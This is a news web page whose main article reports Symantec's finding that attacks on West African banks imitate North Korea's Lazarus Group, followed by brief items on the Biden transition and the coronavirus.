Searching for smart, safe news you can TRUST?

Support safe, smart, REAL journalism. Sign up for our Axios AM & PM newsletters and get smarter, faster.

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Searching for smart, safe news you can TRUST?

Support safe, smart, REAL journalism. Sign up for our Axios AM & PM newsletters and get smarter, faster.

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Denver news in your inbox

Catch up on the most important stories affecting your hometown with Axios Denver

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Des Moines news in your inbox

Catch up on the most important stories affecting your hometown with Axios Des Moines

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Minneapolis-St. Paul news in your inbox

Catch up on the most important stories affecting your hometown with Axios Minneapolis-St. Paul

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Tampa-St. Petersburg news in your inbox

Catch up on the most important stories affecting your hometown with Axios Tampa-St. Petersburg

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Please enter a valid email.

Please enter a valid email.

Subscription failed
Thank you for subscribing!

Bank vault. Photo: Matjaz Slanic/Getty Images

A cluster of attempted digital robberies at West African financial institutions appear to have been imitating the North Korea-linked Lazarus Group's run of heists, according to Symantec.

Why it matters: Lazarus, internationally notorious for the Sony hack and the WannaCry malware, is currently very active stealing funds to support the Kim Jong-un regime. The Symantec finding is fascinating as an example of how attacks trickle down from nations to more common criminals.

The big picture: "It seems like after the high public profile of the North Korea thefts, these hackers took those tactics," said Jon DiMaggio, a senior threat intelligence analyst at Symantec.

Details:

  • The Lazarus group has utilized the SWIFT system, which banks use to request money from one another, in several high-profile thefts, but the attacks Symantec documented did not.
  • What they did use were a similar set of tools to what Lazarus used to set up those attacks, as outlined in a 2017 alert.
  • Symantec did not want to publicly specify the exact tools that were used.

Background: This isn't the first time DiMaggio said he had seen hackers influenced by a high-profile Lazarus attack. After the group's most famous heist, the theft of $81 million from the central bank of Bangladesh, a separate criminal group added SWIFT fraud to their toolkit.

Symantec's report outlined four different techniques of attacks currently being used in Africa that may represent more than one criminal group.

  • The first, the one flagged as similar to the SWIFT heists, targeted firms in Ivory Coast and Equatorial Guinea.
  • All four clusters used a mix of easily purchasable malware and "living off the land" techniques — avoiding detection using as much software already on victims' computers during the break-in as possible.
  • The other groups of attacks spanned Ivory Coast, Ghana, the Democratic Republic of the Congo and Cameroon.

Historically, West African financial groups have not been common targets for hackers, according to the Symantec report. DiMaggio believes that a softer regulatory structure may have made African banks a tempting target.

The bottom line: DiMaggio stressed that IT staff globally have to become more accustomed to looking for living-off-the-land attacks that don't appear to create suspicious network traffic. "You have to look at legitimate traffic," he said. "You can't just wait for a warning screen to flash red."

Go deeper

Updated 2 hours ago - Politics & Policy

Key government agency says Biden transition can formally begin

General Services Administrator Emily Murphy. Photo: Alex Edelman/CNP/Getty Images

General Services Administrator Emily Murphy said in a letter to President-elect Joe Biden on Monday that she has determined the transition from the Trump administration can formally begin.

Why it matters: Murphy, a Trump appointee, had come under fire for delaying the so-called "ascertainment" and withholding the funds and information needed for the transition to begin while Trump's legal challenges played out.

Updated 3 hours ago - Politics & Policy

Coronavirus dashboard

Illustration: Aïda Amer/Axios

  1. Vaccines: Key information about the effective COVID-19 vaccines — Oxford and AstraZeneca's vaccine won't just go to rich countries.
  2. Health: U.S. coronavirus hospitalizations keep breaking recordsWhy we're numb to 250,000 deaths.
  3. World: England to impose stricter regional systemU.S. hotspots far outpacing Europe's — Portugal to ban domestic travel for national holidays.
  4. Economy: The biggest pandemic labor market drags.
  5. Sports: Coronavirus precautions leave college basketball schedule in flux.

Michigan board certifies Biden's win

Poll workers count absentee ballots in Detroit, Michigan on Nov. 4. Photo: Salwan Georges/The Washington Post via Getty Images

The Michigan Board of State Canvassers certified the state's election results on Monday, making President-elect Joe Biden's win there official and granting him the state's 16 electoral votes.

Why it matters: Republican Party leaders had unsuccessfully appealed to delay the official certification, amid the Trump campaign's failed legal challenges in key swing states.